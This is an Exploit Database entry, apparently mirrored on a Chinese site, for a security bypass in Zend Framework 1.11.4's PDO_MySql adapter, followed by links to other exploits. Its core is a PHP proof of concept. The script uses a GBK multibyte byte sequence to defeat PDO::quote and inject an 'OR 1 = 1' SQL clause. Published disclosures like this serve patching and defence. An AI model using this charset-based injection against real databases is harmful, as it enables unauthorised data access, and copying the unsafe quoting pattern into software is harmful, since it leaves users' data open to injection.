Zend Framework 1.11.4 – ‘PDO_MySql’ Security Bypass

Exploit Database
84 阅读

作者： Anthony Ferrara

日期： 2011-05-19
类别：
- remote
平台：
- linux
来源：https://www.exploit-db.com/exploits/35784/

source: https://www.securityfocus.com/bid/47919/info

Zend Framework is prone to a security-bypass vulnerability.

An attacker can leverage this vulnerability to bypass certain security restrictions. Successful exploits may allow attackers to exploit SQL-injection vulnerabilities.

Zend Framework versions prior to 1.10.9 and 1.11.6 are vulnerable. 

$dsn = 'mysql:dbname=INFORMATION_SCHEMA;host=127.0.0.1;charset=GBK';
$pdo = new PDO($dsn, $user, $pass);
$pdo->exec('SET NAMES GBK');
$string = chr(0xbf) . chr(0x27) . ' OR 1 = 1; /*';
$sql = "SELECT TABLE_NAME 
FROM INFORMATION_SCHEMA.TABLES 
WHERE TABLE_NAME LIKE ".$pdo->quote($string).";";
$stmt = $pdo->query($sql);
var_dump($stmt->rowCount());

last Exploits
Zend Framework 1.11.4 – ‘PDO_MySql’ Security Bypass的更多信息

Mako Server 2.5 – OS Command Injection Remote Command Execution (Metasploit)：
Nagios3 – ‘history.cgi’ Remote Command Execution：
D-Link Devices – HNAP SOAPAction-Header Command Execution (Metasploit)：
FireEye – Wormable Remote Code Execution in MIP JAR Analysis：
eMerge E3 Access Controller 4.6.07 – Remote Code Execution：
MikroTik RouterOS < 6.41.3/6.42rc27 - SMB Buffer Overflow：
BroadWorks – Call Detail Record Security Bypass：
Eir D1000 Wireless Router – WAN Side Remote Command Injection (Metasploit)：